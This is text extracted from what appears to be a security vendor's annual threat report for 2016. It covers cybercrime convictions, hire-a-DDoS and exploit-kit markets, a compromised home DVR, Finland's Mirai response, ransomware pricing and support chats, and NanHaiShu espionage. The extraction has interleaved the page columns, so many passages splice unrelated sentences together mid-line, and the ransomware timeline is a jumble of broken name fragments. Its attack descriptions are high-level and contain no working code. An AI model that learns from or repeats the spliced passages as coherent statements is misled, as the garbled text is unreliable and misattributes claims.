company who was hit with the first attack. Upon was determined, giving credence to the idea that the on the Internet. Independent threat actors out there
discussing the attack, they noticed patterns in how threat actor felt he had impunity, being outside of the need to understand that investigators have access
the threat actor was operating, and brought our CSS jurisdiction of European law enforcement. to a surprising amount of metadata. Authorities are
consultants in to help. experienced enough to know what data to correlate in
Its obvious that our guy is on the FBIs most wanted list
order to paint a picture of attackers. IP addresses used
CSS staff correlated forensic data from both attacks because of his alleged participation in SEA, given that
in attacks, the language and email addresses used in
and quickly arrived at the conclusion that they were members of the organization are considered state
phishing campaigns and other correspondence, social
indeed being carried out by the same threat actor. actors. But it hasnt been proven that the SEA are on
engineering tactics, TTPs used for persistence and
They informed the second victims company of their the Syrian governments payroll, or that theyre taking
lateral movement, or even time correlations between
findings from the previous investigation, including the orders from the Syrian government. What is known is
outbound connections from an ISP and subsequent
identity of the criminal. They also informed the second that some of the actions theyre performing appear
outgoing connections from a VPN exit node are used
victim that the investigation had led to a dead end. to forward the goals of the government. So, what are
to paint this picture. As careful as attackers might
However, it turns out that the second organization the real motives of the SEA members?
be, its going to be almost impossible to prevent
was rather well connected with international law There are a few possibilities. Members may have been authorities from putting the puzzle together. And from
enforcement, and shortly after, the perpetrator in coerced (threatened, a family member thrown in jail, there, it doesnt take all that long for the authorities to
question showed up on the FBIs cyber most wanted etc.), they may be idealists who are working for the discover their suspects real identities.
list. cause, they may be mercenaries or lone gunmen
Our advice to anyone thinking about getting involved
looking for financial gain, or they might be working
Nation state or not? toward a get out of jail free card. As far-fetched as
in the same sort of stuff as our perpetrator? Dont
In spite of the timing, the fact that our suspect had bother.As good as you think you are at hiding your
the idea seems, weve actually witnessed the get out
shown up on an FBI list shortly after revealing his tracks, the Internet simply doesnt work that way.
of jail free card in action. Yevgeniy Bogachev, another
identity to victim number two might have just been guy on the FBIs cyber most wanted list, was allegedly
a coincidence. The criminal in question faces a long busted by the Russian authorities a few years back for
list of charges, many of which are tied to the Syrian being the mastermind behind GameOver ZeuS. But if
Electronic Army (SEA). Looking at the charges he was arrested, he didnt stay detained for too long
Page 30
The Consequences of Cybercrime Sooner or later even the most cunning
criminal will commit a fatal flaw
AT TIMES, cyber security seems all doom and gloom. Criminals wreak havoc while hidden January
services, anonymous handles, and other obfuscation techniques conceal them from discovery. A Manhattan judge sentenced a Latvian man, Deniss Calovskis, to 21 months time already
served for his role in the Gozi virus, which infected around 40,000 US computers. Calovskis
But sooner or later even the most cunning criminal will commit a fatal flaw that opens a crack reportedly wrote a section of the code and profited to the tune of $1000 for his part in
the scheme.
through which law enforcement can follow their scent and track them down. Heres a rundown
Hacker Onur Kopcak was sentenced to a record 334 years in prison for identity theft and
of many of the past years successes in which criminals have had to face the consequences of bank fraud in Turkey. He operated a phishing website that impersonated a bank site.
their actions.
February
A UK teenager and member of the hacker group Crackas with Attitude was arrested for
his role in hacking the emails of senior US government officials such as CIA director John
Brennan and Director of US National Intelligence James Clapper. The group is also accused
of, among other crimes, doxing thousands of employees at the FBI and Department of
Homeland Security. Two more group members, Americans Justin Gray Liverman and
Andrew Otto Boggs, were arrested in September.
April
Hackers behind SpyEye, a prominent banking Trojan in 2010-2012, were sentenced by a
US court for developing and distributing the malware. Algerian Hamza Bendelladj was
sentenced to 15 years, while his partner, Russian Aleksandr Andreevich Panin, received nine
and a half years. The malware infected 50 million computers globally, costing its victims a
combined one billion dollars.
The creator of the Blackhole exploit kit, Dmitry Fedetov, otherwise known as Paunch, was
sentenced to seven years in a Russian penal colony. A highly popular crimeware service
for years until Paunchs 2013 arrest, Blackhole was responsible for a large percentage of
malware infections. Six of Paunchs co-conspirators were also sentenced to terms ranging
from five to eight years.
May
Ukranian hacker Vadym Iermolovych pled guilty to his role in an international insider
trading scheme in which newswire services were hacked and yet-to-be-published financial
press releases were stolen. The scheme generated $30 million, and the hackers were paid
a cut of the profits.
June
Russian authorities arrested 50 people connected to a hacker group that siphoned around
25 million dollars from accounts of Russian financial institutions over the past five years
using malware called Lurk.
Page 31
The Consequences of Cybercrime
Page 32
Cyber Crime At least one of these botnets
is now available for rent at
HACKERS offer cyber crime as a service as a way DDoS e-commerce of companies like Amazon, Alibaba, and eBay for
of commodifying their skills so they can be bought Booter/stresser services exemplify how cyber crime many Internet users. But there are more specialized
and sold. But many hackers dont set out to become has become an industry. These services allow anyone forms of e-commerce that cater to criminals. And
career cyber criminals. Most start by developing a to rent online tools to launch DDoS attacks. DDoS not just on the Darknet lurking below the Internet
healthy interest in computer networks, coding, and attacks were responsible for some of the most notable that average users are familiar with. There are online
other technical subjects. Often these interests steer cyber incidents of 2016. Mirai-based botnets were forums accessible to everyone where cyber crime
people into developing computer software, websites, particularly problematic last year, and responsible commodities are discussed openly and freely by
or similar career paths. However, there are alternatives for the largest DDoS attacks in history. Hackers are masquerading as legitimate services.
to these traditional forms of employment including now adapting Mirais source code, which was leaked The DDoS industry is a perfect example of this. These
providing hacking services to people for money. online, for use in their own botnets. Reports suggest DDoS services are able to advertise themselves in
These services rarely appear spontaneously. They that at least one of these botnets is now available for very traditional ways by claiming to be stress testing
usually grow out of other interests. For example, a rent at a rate of about three to four thousand dollars resources for information security specialists and
recent expos on the suspected coder behind Mirai for two weeks. And its not just DDoS attacks that are website administrators. Skirting this grey area is
traces his development from a bright programmer, being bought and sold online. Exploit kit servers used common for cyber crimes, where legal authorities
to an entrepreneur running Minecraft servers and to attack software vulnerabilities can be rented for as often struggle with limitations in process and
then DDoS mitigation services, to programming and little as 500 dollars a month. Combining an exploit kit jurisdiction. Hackforums.nets server stress testing
operating a botnet behind some of the largest DDoS with other resources, such as ransomware and botnets section, which security experts say was one of the
attacks in history. that conduct spam campaigns (both of which can be most popular sources to advertise DDoS for hire
This example shows how hacking can develop from purchased), can turn a technically inept hacker into a services, was recently shut down by the sites owner
a casual interest to a means of earning extra income. financially successful cyber criminal. over heightened scrutiny after the Mirai attacks
And from there, they can become full-blown business Online marketplaces where these cyber crime mentioned above. These services are also able to
ventures that generate healthy revenues comparable commodities are advertised, shared, bought, and use various social media websites such as Twitter
to other successful businesses. And a collection of sold exist, making various tactics, techniques, and to spread their message. Advertising strategies like
successful businesses adds up to more than the sum procedures accessible to a wide range of threat these, as well as the use of Bitcoin to conduct financial
of its parts it becomes an industry. actors. The word e-commerce invokes thoughts
Page 33
Cyber Crime Marketing 101
Attacks were timed to coincide
with the holidays to maximize
their awareness raising
efforts
transactions, make cyber crime resources accessible searches for Lizard Squad increased exponentially working to influence last years US presidential election
for both experienced and amateur cyber criminals. in December 2014, and then rapidly declined through by stealing information from the Democratic National
January 2015. In a video interview following the event, Committee and then leaking that information to the
A textbook example: Lizard Squad a Lizard Squad member claimed that the events were public. Building awareness from these acts through
Marketing, advertising, and publicity are now intended to raise awareness regarding the low state the mass media was key to achieving the attackers
important tactics for successful career cyber criminals of computer security at these companies. objectives, just like the Lizard Squad example above.
to understand in order to draw attention to their And generally speaking, all hackers understand that
Whether the group successfully raised awareness of
wares. And as mentioned above, these models can companies are especially concerned about how these
the security problems facing these companies is an
include the use of social media marketing and word headlines could affect their bottom lines, making it
open question. But regardless of their intent, the
of mouth. However, some groups have taken this a another pressure point for hackers to exploit in their
group quickly moved to capitalize on their newfound
step further, and actually conducted cyber attacks attempts to extort money.
fame by introducing their Lizard Stresser attack tool as
motivated primarily by the need to advertise their
a service for hire. The tool, made available less than a Marketing. PR. Community outreach. However you
services through the mass media.
week after the attacks, allowed customers to rent the choose to name the trend, it signifies the industrial
Lizard Squads 2014 attacks on Sony and Microsoft groups botnet to use for their own DDoS attacks. The logic thats become pervasive amongst hackers.
over Christmas are a textbook case of this strategy. attacks on Microsoft and Sony provided Lizard Squad Everyone understands that its become a good
Lizard Squads DDoS attacks crippled Sonys with impressive references to qualify the efficacy of business to be in. Everyone except for organizations
Playstation Network and Microsofts Xbox Live Service their tool, which any good marketer will recognize as a that feel they, for whatever reason, wont become a
for approximately 24 hours on December 25th, with valuable tactic to set themselves apart from potential target.
some users still reporting problems several days later. competitors.
Reports suggested that as many as 150 million people
None of this was new to the cyber security community,
were unable to use their Xbox or Playstation game
and the pieces were quickly put together by journalists
consoles as a result of the attack. Tweets sent from
and researchers that follow the threat landscape.
Lizard Squads Twitter account following a different
incident in early December verified that their attacks Its not just cyber crime
were timed to coincide with the holidays to maximize While cyber criminals form a significant part of these
their awareness raising efforts. industries, theyre hardly alone. Hacktivists have a long
The campaign generated significant amounts of history of using DDoS attacks to intimidate targets and
publicity for the group. They drew attention from draw attention toward whatever cause theyre out to
not only the companies and their customers, but support. The US intelligence community has accused
also the general public. According to Google Trends, advanced persistent threat (APT) groups in Russia of
Page 34
THE INSECURE 36
IS MIRAI
HOME SECURITY
SYSTEM
THE FUTURE
After years of warnings from BUG
OF THE IOT?
security experts, the inherent
insecurity of IoT devices was
exploited in mass fashion Trolling, cyber bullying, and general f*ckery.
when large swaths of the
Internet were brought down Between 2008 and 2012, organized protest
in Octobers DDoS assault on groups associated with anon and 4chan ran fairly
US service provider Dyn. high-profile ops. The most famous of these that
comes to mind was a protest against the Church
A recent investigation of a SELL of Scientology. Since then, things have changed.
DVR camera by F-Secure Some members of these groups were arrested or
Cyber Security Services turned by law enforcement. Others moved on to Of course, cyber bullying and trolling takes many
illustrates why even high-end start supporting the Arab Spring and other Middle- shapes and forms. The cases that our consultants
IoT products may not offer Eastern causes. Basically, we saw an end to the high- investigated were very targeted. But generally
the device security purchasers profile organized ops that previously defined these
may expect. speaking, theres a lot of random nastiness on the
groups. And much of the doxing weve seen since Internet that can take the form of discussion forum
then has consisted of recycled material obtained trolling, Twitter trolling, nasty comments on YouTube,
during their heyday. and in some cases, pictures or video being lifted
from Instagram/Snapchat/Periscope and posted
But the spirit of what these organizations stood for on discussion boards and adult sites. As obnoxious
GUEST ARTICLE still lives on in many of their former members, some
of whom continue to run as lone wolves. And it
behavior and 4chan culture becomes the New Internet
Normal, its little wonder that kids are turning to other
seems like theyve carried their grudges along with crap such as botting and cheating in video games, and
FICORA 38 them. DDoSes against Minecraft servers (which happen to
RESPONDING TO A bring down major Internet infrastructure, such as Dyn,
During 2016, our Cyber Security Services as collateral damage).
MIRAI OUTBREAK IN consultants investigated a number of trolling cases.
FINLAND Victims of these cases were mostly high-profile
business people who were alerted to the fact that
Finland was not spared from the 2016 a third party had set up one or more social media
Mirai epidemic, and weve confirmed accounts in their name. In a case of somewhat-
approximately sixteen thousand stolen-identity, these attacks were designed to
compromised devices in the country. What damage the victims reputation. Looking at the
follows is an account of how we at the targets and motivation behind these attacks (which
National Cyber Security Center of Finland ranged from fun to revenge), its possible that
(NCSC-FI) responded to the situation.
some were carried out by the lone wolves we
mentioned earlier. One might even speculate that
these mini ops could be part of an attempt to get
the band back together.
Share
report
The Insecure Home Security System
AFTER YEARS of warnings from security Unfortunately, as exemplified by the recent case
experts, the inherent insecurity of IoT devices of a compromised digital video recorder (DVR)
BUG Hacker finds a investigated by F-Secure Cyber Security Services, this
was exploited in a mass fashion in a series of DDoS vulnerability
attacks during the fall of 2016. In the largest of these incentive deficit is not limited to the makers of cheapo
attacks, legions of malware-infected IoT devices devices.
were employed, bringing down Twitter, Spotify, and
a host of other services depending on Dyn. During the
The case of the haunted DVR
previous month, a similar assault was made on security Hacker starts scanning the The head of a venture capital investment firm had
Internet for vulnerable installed a high-end DVR (retailing at around $1000),
journalist Brian Krebs site. devices using some sort of
search engine (e.g. Shodan) as part of a multi-camera security system for homes
Until the autumn attacks, and with some exceptions, and small offices. He integrated it with the rest of his
IoT exploitation scenarios have been more discussion security system according to the manuals instructions
fodder than reality. Would a hacker take control of
your thermostat and demand a ransom payment to
As a result, the hacker gets
turn down the sweltering heat? Could your fridge be a list of vulnerable devices
used as an entry point to invade your home network? on the Internet
Whats more attractive to miscreants: the device itself,
or the server behind it where the data is stored?
The recent DDoS events will surely add resolve to the Someone buys the list and
SELL categorizes "interesting" The person then sells each and
European Commissions proposal to enact a product targets into buckets every bucket of targets to vari-
labeling system for IoT devices that are deemed ous parties, and high-value
targets go to the highest bidder
secure. The idea is to make not only buyers mindful Hacker sells this target
of security, but more importantly manufacturers, who list on an underground SELL
forum
are dismally lacking incentives to make their devices
SELL
secure. Whether product labeling accomplishes this
goal, however, remains to be seen. SELL
This sequence of events is standard practice in some countries
where hackers can get real world perks by providing useful
information or access.
Page 36
The Insecure Home Security System
and protected the device with a proper password. One Money cant buy everything
of his security cameras pointed toward his workspace The case illustrates that in todays market dynamic,
and computer monitor. sadly, paying more doesnt mean a product is more
Two events alerted the exec to the possibility that his secure it only means it has more features. While
DVR had been compromised. For one thing, the boxs purchasers of high-end IoT products may consider
lights were actively blinking at times when it should themselves secure, such an expectation is only a myth.
have been quiet. And secondly, when he would try Until connected things adequately address the
to invest in certain firms he was consistently getting security challenges they face, users would do well to
outbid. He began to wonder if someone was getting consider the tradeoffs of their devices being online.
an inside peek at his bids by viewing his computer In the case of a DVR, Internet connectivity allows the
paying more doesnt mean a monitor via the security cam footage. user to view their premises remotely, through an app
product is more secure it only
means it has more features. Our CSS teams investigation revealed that his but it also opens up the risk of the device getting
suspicions were correct: the device had indeed been owned and working at the behest of an attacker.
compromised. A vulnerability in the box had allowed
a hacker to change the password remotely over the
Internet, without knowing the existing password, and
to download stored content from the device. Our
investigation led us to Russian language forums where
this particular vulnerability was being discussed.
Who hacked the DVR box, and why? We cant say for
certain; attribution is both difficult and dangerous.
We also dont know if the suspicious outbidding was
a mere coincidence.
We reached out to the maker of the DVR box. When
provided with details of this vulnerability, they were
uninterested in taking steps to correct it. The
particular model is no longer on the market, and
a newer model exists but thats not to say the
newer model doesnt also have the same flaw.
Page 37
GUEST ARTICLE
2016 saw the birth of Mirai-based botnets. Mirai, gone berserk? Or was there really a massive malware
a piece of code, exhibited incredible capabilities distribution campaign happening in Finland?
that grabbed the attention of the cyber security We were aware of various blog postings published over
community. Reports suggest that millions of devices the weekend that analyzed the infection mechanism
across the world were compromised during the latter of the Mirai malware. And we knew that the latest
half of the year. Finland was not spared from the Mirai variant scans for open services on TCP port
epidemic, and weve confirmed approximately sixteen 7547. Our first suspicions led us to believe that one
thousand compromised devices in the country. of the sources feeding information to Autoreporter
What follows is an account of how we at the National was rather sloppy in giving infection verdicts. We
Cyber Security Center of Finland (NCSC-FI) responded performed a few queries with raw Autoreporter data,
to the situation. which confirmed that the majority of detections on
Sunday did in fact have traffic to TCP port 7547.
Start of incident response
We also checked our own sensor data and saw that
Monday, the 28th of November was supposed to be
TCP 7547 scanning started on November 25 at 13:30
a normal working day at NCSC-FI. But the first thing
UTC. To say that the scanning traffics growth was very
that caught our eyes in the situation center was an
aggressive would be an understatement. Prior to this
Autoreporter graph that exhibited an enormous
spike, Mirai had only infected a few hundred devices in
peak of different malware detections on Sunday,
Finland. That number had suddenly grown to around
November 27th. Autoreporter is the NCSC-FI service
16,000.
that automatically collects malware and information
security incident observations concerning Finnish An action plan
networks. We now had a firm belief that we were looking at a
The peak was definitely something we would have to rather massive Mirai botnet expansion in Finland.
investigate, but we were unsure where to start. Was We started contacting the biggest Finnish ISPs and
the peak caused by some glitch or feature in our data creating an action plan. The ISPs had made similar
normalization routines? Had some of our data sources observations on their own, and there was a general
Page 38
Responding to a Mirai Outbreak in Finland
Page 39
THE YEAR IN Share
RANSOMWARE report
Apr
THE BITCOIN DILEMMA 42
Jun
Feb
THE RANSOMWARE TUBE MAP 41
Aug
Jan
$$$
Oct
RAnsom
Dec
$
2014
2012
2013
2016
100
GUEST ARTICLE
Nov
VIRUS BULLETIN 47
CRIME WITH A BITCOIN FRICTION WHAT WE ARE DOING
CUSTOMER MINDSET
43 IS RANSOMWARES
45 RIGHT
Sep
ONLY CONSTRAINT
Clicks
Ransomware is a trend with staying50 Every day, one hears stories of nation states
power, thanks to it having found a 7: I dont have a bitcoin account yet and being hacked, websites being taken down
business model that works. Journalist cant make it within 3 days, as you know. through DDoS attacks and businesses being
Brain Krebs noted that the more Support: We removed all deadlines for brought to a standstill due to ransomware.
Jul
1
2012
8
2013
2012
13
2014
Ra
nn
oh
Ra
ns
o
De mLo
Ha
2013
Di cr ck
ra
so
rty yp
m
De t P
O
ap
Re -Lo
hi
Sk ac ck
Vi
O to e
id
Cr cL C r r
oc
Lo pe r y
c yp ke
ru U
r
ra pto
Bu to K
t
y T C
s-E nb
Saker/
r
In
m Po KEion wal
Cr UnorL eyB ryF G l
te
r
as m
yp loc oc TC ile
C t k
-S p
na
Vi YHo lob 2
S
T
a
rlo ld a
tio l
Page 41
Br ryp PClooWkCoer2
M am ous Co es ck er III
t r t t
na
ire sa
an to c all d 01
l k 3 e 5
ve laC
da Fo
Th
St Wam
r r Po re rto ry
li rc rtr
2015
a t n pt
Kr J
ho es
T ce r s
Ke Cryictoe Lin Sc F
b
yR bo r Te
Lo oxcAss
N a ra ind
Cr ux. pe e sla
M K em ng la ck ry ist y En r r C
.C ak imc uc er
ry tu ilW od er pt or CrptoI cod ED Rryp
pt bL a yp nfi e Tr
t n r A2 Na anst 3.
Lo Po
oH oc re
Offl Le old /H no om0+
CT
MoWaite
in
as ke
wL we
B
C h es id Lo 32
ab ll4 Co d c
CeYour er C ev rW in iff h
yp o iL Hy HDM-Lo
Fonco
Fa ou
Te r . re CrenTker
Pa to C oc dr i A ck
kb ia Va
Raans Goryp C B el04orm
o
yp ea
d t
sla S Peber M en ult t r
ag
XRUngRak ammwmasoJohimrazi
Cr urp ty 7e ear
ic
Xonco eCr Sp nctdCr Lo Loc ryp kLi iL aCrBudLocer WCr
ult 4 e
Cr .1A
yp
t
2016 Jan
Feb
Mar
Apr
May
Jun Ro
77 Jul Aukku
8lo7 Aug 7h BotoL
Ba ck8 Cr Sep Sa 9r Br oyaock
BitdBl CrypM Oct Ba AMtana CrLoc h y
BloCryock CTypt IC Cr Nov Dekso Ap BA Cryptk
Cr catpto CuB-FoFin HDyLo Dec An DotoxCry M oca CryptFile2
Crype to r Ja teRake anc Ph DCcke Ai Su gry Fa minCrypt BaIRCOlyp CryptoBit
DMypt rn NogerDansr ial Poilad rypr YaraCr Cr Crrve Du Fairwa o pt Bitrt P se CryptoHo
2017
EI- ALXX 2 Piz ob ecomw Unlygoelphtor Crfun op HTypt Exypty ck FSnto re Cr Sta GNyptoMi st
En Pol ock.0 Po zaCCry rypt are Cr blo t ia DuyptnLo Ka Ccoriu HuoticoWi Gl ociem Cryptck Go L LXX x
Ghigmock er 3 R9wer ryppt or FeyPy ckU en mmoLucke Kongaryptm IFNcky re Hiobe ty Kr ypt38 Je ph ock
M ost a er .0 Sim80 Wa ts KanixL PC FS cry yLock r Kr olo rooor Ja 64 Potler CratosoRo Jigiphoer er
ODischCry St ple re Lowai ock GrocieptJJ cke Loake va Ki ck.p3 Rekem Crypt Cryger Ko saw os
Sh COa pt SZamp _E M ckLiLocer iR em ty S r Pocken KollerL ot Se ktL on DEyptXX 3pt Lo rea
SNujin DC UnFLo adonco NaarsJock ker Kaansoit Depcod-in Lo sty ock Shrpicock GO Ed DCXX 3.0 n
Mrtok
Zc SLo lo cke der Nuginoke Ozrma m Ba riaLrn T M ck9a er Shark o er GouCrryp .1 MML
ck r
Zyryp cke 92 Nuke i Smoza n1aste3 Smino Heop ypttor Reobe ock
Pull quote
$1000 $1000
RANSOMWARE pricing is like a game price at the time of infection. For this reason, ransomware criminal F-Secure communicated
of The Price is Right. The criminals want to ask as ransomware families sometimes adjust their with in our 2016 ransomware study dropped his
much as they can, but if they set their sights too Bitcoin asking price to keep it in a general range. asking price to .4 Bitcoin on June 17, when the
high, the fish swim away. At least, when it comes One day the price may be 1 Bitcoin, the next, after price of a Bitcoin was about $750 (thats $300).
to consumers. When it comes to businesses, loss a jump in Bitcoin value, .85 Bitcoin. On January 26 of 2017, we communicated with him
of access to business-critical data and systems On the surface, ransom fees that are stated in again and his final offer was still .4 Bitcoin, when
makes it harder to walk away. A recent study by dollars would seem to be more stable for the the price was hovering around $915 (thats about
IBM found that while over 50% of consumers victim. $500 worth of Bitcoin is still $500, whether $366).
said they would not pay a ransom to get their a Bitcoin is worth $100 or $800. But its not always According to F-Secures own unofficial Twitter poll
encrypted files back, 70% of businesses that had so straightforward. last spring, ransomware criminals might do well to
$500 experienced an infection had paid up. keep their rates on the lower side. While only 8% $500
If an attacker states a demand of $500 worth of
The price a victim pays for a ransom depends on Bitcoin, and the Bitcoin price suddenly jumps, of respondents said theyd be willing to pay a fee
whether the payment is requested in Bitcoin or a by the time the victim figures out how to make of more than $400 to recover lost data, 29% were
real-world currency such as dollars. the payment, $500 wont buy as much Bitcoin as willing to shell out an amount under $400.
Take the example of a one-Bitcoin ransom. In 2016 before and the attacker may request more.
that could have meant anywhere from $357 at its Some reports show that the average ransom
lowest in January, to a high of $993 at years end. demand has increased. According to a Symantec
Bitcoin prices can fluctuate as much as $100 in study, the average demand in late 2015 was $295,
a couple of days, meaning that waiting to pay a rising to $679 in July of last year. The trend can be
ransom could mean quite a difference from the attributed in part to the rise in Bitcoin value. One
2016 WAS , by many accounts, the seized on the idea of the customer journey.
year of ransomware. In late 2015, F-Secure Journalist Brain Krebs noted that the more STARTING LOWEST
experts predicted that the growing number successful strains of ransomware would be the
FAMILY DEMAND DEMAND %DISCOUNT
of ransomware threats theyd seen in our ones that know how to offer good customer
telemetry would continue to increase. 2016 service to their victims.
did not disappoint. To that end, ransomware families have evolved CERBER 530 530 0%
Ransomware made its first major appearance to offer customer-friendly features to guide
of the year when it crippled the systems of their victims in making the Bitcoin payment.
the Hollywood Presbyterian Medical Center Personal webpages in several languages.
in February 2016. From then on, ransomwares Helpful FAQs. Free trial decryption for one CRYPTOMIX 1900 635 67%
antics played out in the headlines with a file. And support channels where customers
steady stream of stories about businesses, can get in touch with the crooks.
medical centers, and even law enforcement How good is ransomware customer service?
agencies being hit. To find out, we reached out to the criminals JIGSAW 150 125 17%
Ransomware is a trend with staying power behind five active families via their support
thanks to it finding business model that channels. A non-technical employee played
works. The promise of unlocking encrypted the part of a nave victim. Her experience
files is a clear benefit, and too often its the varied depending on the family, but there SHADE 400 280 30%
cheapest, most efficient option for affected were some definite consistencies.
organizations.
Ransoms can be negotiated.
A successful business model isnt the only AVERAGE:
We found that ransomware criminals are
concept that ransomware has borrowed from 29%
usually willing to negotiate on the price.
traditional business. Its perpetrators have also
Three out of four variants we made contact
Page 43
Crime with a Customer Mindset
Page 44
Bitcoin Friction is
Ransomwares Only
Constraint
IN JANUARY 2017, I began tracking A great deal of the chat support issues revolve around
the customer portal of an innovative new family one thing: Bitcoin.
of crypto-ransomware called Spora. Among its 7: I dont have a bitcoin account yet and cant
innovations are a dedicated domain (spora.biz, spora. make it within 3 days, as you know.
bz, et cetera) running a Tor web proxy, HTTPS support,
an initially lower extortion demand, and tiered pricing Support: We removed all deadlines for you.
with options to unencrypt individual files (up to 25Mb Apparently 7 thinks its not so easy to setup a Bitcoin
in size) rather than all. account as you know.
Also part of the portal: a group chat function for And heres another practicality that exists for many
support requests. Multiple conversations are all people in the cash economy:
strung together, making for a fascinating read overall.
A: Admin, I dont know what checked the course
Among recent conversations is a bit.ly link to a forum means. It is hard to purchase bitcoins in the US
page on the site BleepingComputer.com where the I drove over 200 miles to purchase 500 worth,
Spora Administrator wanted reviews left, as evidence they took 10% you take 11% I had USD70 in a
that paying the extortion results in unencrypted files. different wallet you took 11%, you have USD466
The bulk of clicks, according to bit.ly statistics (see and I have no way to purchase more until
the graph on the next page), occur on a Tuesday. tomorrow and will once again have to drive 200
FYI: running a cyber extortion scheme is a regularly mile to get them and get home. Please consider.
scheduled job and spam runs go out on Tuesdays. Support: No problem
Page 45
Bitcoin Friction is Ransomwares Only Constraint
The bulk of clicks on the review page for Spora ransomware occur on a Tuesday, the same day spam runs go out. Many people dont have the needed resources to buy
100 Bitcoins online. Credit is required, and there are plenty
of people with insufficient credit. For them, a physical
Bitcoin ATM or brick-and-mortar retailer is required.
We should be thankful that there are at least some
practical barriers to purchase Bitcoins. If it were any
easier to do so, very little else would check the growth
of crypto-ransomwares business model. The malware
technology to encrypt data has been possible for
many, many years; the bigger challenge has always
been getting paid.
Clicks
50
In the past, cyber crime schemes (such as scareware)
have been killed off by disrupting the money supply.
The same may well be true of cyber extortion; to
kill the business model, it may be necessary to ban
Bitcoin.
Further reading: Evaluating the Customer Journey of
Crypto-Ransomware
Sean Sullivan
0 Security Advisor
Feb 3rd Feb 7th Feb 12th @5ean5ullivan
Page 46
What we are GUEST ARTICLE
Martijn Grooten
DESPITE having a strong interest in current Given the opportunistic nature of ransomware, where solutions improve security quite a bit, and seriously
affairs, the only two Finnish politicians I can name, I millions of infection attempts are being made every reduce ones chances of being faced with that feared
know for the things they have done in and for other day, this doesnt mean those businesses were just pop-up asking for a ransom.
countries. The reason that Finland rarely makes the lucky. Rather, it showed they did something right. So while we should continue to talk about what went
news isnt that people dont care about the Land Unfortunately, especially for the other half of the wrong, lets also focus at what we are doing right.
of a Thousand Lakes; its that things in Finland are picture, there is no silver bullet. There is no one thing Because that can improve security for everyone.
generally OK. that makes you invincible to ransomware, just like
The same is true in security. Every day, one hears stories there isnt such a thing for any kind of online attack.
of nation states being hacked, websites being taken But there are many things businesses, organisations
down through DDoS attacks and businesses being and individuals can do to mitigate the threat and to
brought to a standstill due to ransomware. These are seriously decrease the chances of being hit. Martijn Grooten
the stories that motivate any security professional to Keeping regular backups is a good and important Editor, Security Researcher
work hard to make things better. thing do to, as is making sure your software is always Virus Bulletin
That shouldnt stop us from appreciating how many patched. Removing unnecessary software and plugins
things we are doing right though. Take ransomware, helps a great deal, and of course the usual advice about
for example, rightly seen by many as the biggest clicking links and opening attachments applies too.
security plague of the moment. Sure, it does affect And then there is security software. Because despite
many individuals and businesses and the stories of all our good intentions, theres always this one device
libraries being shut down or parents losing all their we didnt back up, this plugin that is slightly out of
childrens photos dont make for happy reading. date and that email that really did look important. It
But that is only half of the picture. A recent IBM study would be wrong and dangerous to consider security
showed that a little over half of business said they had software as a simple solution that could be replaced
never been affected by ransomware. by following good practices. As Virus Bulletin and
other testers have repeatedly shown, many of these
Page 47
TODAYS APTS ARE
NAN HAI SHU 49 TOMORROWS
Digital espionage rose to the surface
last year in the ongoing dispute over
territorial rights in the South China Sea. Advice from the field
OPPORTUNISTS
F-Secure researchers uncovered and Share
Our Cyber Security Services consultants were report
investigated a malware strain targeting
organizations who all had one thing in involved in many incident response and threat
common: They all played a role in an assessment gigs during 2016. Heres what they had to
arbitration case filed by the Philippines say about the common attack and lateral movement
against China. vectors they encountered in the field.
The evident goal? To gain visibility into Based on our Red Teaming exercises, phishing still
the legal proceedings surrounding works terrifyingly well. One of the most effective
the Philippines-China case. techniques was to email a victim a link to a fake Vulnerable hosts directly connected to the Internet
website using a typo-squatted domain. Since well- were still juicy targets during 2016. We also saw our
tuned spam filtering, security gateway products, and fair share of ransomware incidents, and plenty of
endpoint protection technologies are able to easily phishing. Cyber bullying is an unfortunate and very
block malicious attachments, focusing on social sensitive topic in corporate environments. We were
engineering provides the best results. Advanced involved in a handful of such investigations, in addition
attack techniques to bypass these security products to the more typical malicious insider incidents.
are possible, and weve done that as well.
While it is true that nation-state actors have exciting
BEYOND THE 51 Sometimes physical access to the target location capabilities also in offensive security, we feel that
NATION STATE and penetrating the network from inside is the way many of the more exotic mechanisms are somewhat
to go. Lock manipulation to get access to a building overhyped. The focus of organizations should be
is a technique weve learned to embrace. Layered to first master the basics of information security -
Sophisticated cyber attacks tend to start security is just not a security meme from ye olden prevention, detection and response. For example,
at the top and work their way down. As the in many companies we worked with, the core
TTPs used in such attacks are made available times, its actually something worth implementing.
to the public, less-organized actors take them But to do that, you need to plan carefully in order to components of a network were left unmonitored, and
into use. eliminate potential conduits that can pierce all the hence they got breached without even noticing. We
layers. feel its important to at least start monitoring internal
In many cases, its manufacturers that are network or SSO usage, carefully log resource access
being hit - most likely because of lax cyber Living off the land by using built-in Windows WMIC to common services, and put systems in place to look
security practices. Whats interesting about and PowerShell capabilities, and related attack for anomalous traffic patterns.
these attacks is that they arent strictly frameworks, is something used by both legitimate
targeted. Theyre opportunistic. offensive security professionals and online criminals. Traditional techniques executed well still work - if
During 2016, we investigated breaches where the you feel your current monitoring capabilities are
The actors behind these types of operations up to scratch, then it makes sense to reach for the
perform wide-sweeping scans of the attacker had used Metasploit very extensively and
next level. Traditional information security is very
Internet, looking for systems with known, pivoted throughout the environment with its built-in
easily-exploitable vulnerabilities. This modus tools. Performing forensics in this kind of scenario much alive in 2017 and is an enabler for cyber security
operandi is highly effective. is challenging, but most definitely doable with the activities.
right skills and tools.
Nan HAI SHU
November 2015
APEC summit takes place
WHENEVER there are high-stake Multiple samples of the malware (which
October 2015
in the Philippines
political and economic matters playing out F-Secure researchers dubbed NanHaiShu) Samples seen in the wild
C&C servers switch IP AELM Entertainment
on the world stage, its safe to assume that had been seen in the wild for a couple of address budget and Attendance
some form of espionage is taking place in the allowance.xls
years, but one particular subset appeared to
background. And cyber espionage is cost- have been tasked with intelligence-gathering October 2015
News on US ships
effective and difficult to attribute. So said in the Philippines v. China case. The malware movement
our Cyber Security Advisor Erka Koivunen to arrived via spearphishing emails with an June 16. 2015
Motherboard back in August. attached VBA macro file that executed an Deadline for China to
submit response
This intersection of geopolitical events with embedded JScript file.
May 2015
the cyber world could be the banner for 2016. Three of the notable targets included the Salary and Bonus
Data.xls
Perhaps the biggest cyber news of the year Department of Justice of the Philippines;
came in conjunction with the US elections. organizers of the Asia-Pacific Economic March 2015
The draft Foley Hoag reform of the
Allegations of Russian hacking into the Cooperation (APEC) Summit that took place distribution of shares and
renumeration system.xls
Democratic party in an effort to influence the in the Philippines in November 2015, where the
election outcome made waves and raised real case had been expected to be discussed; and March 15. 2015
Deadline for Phillipines to
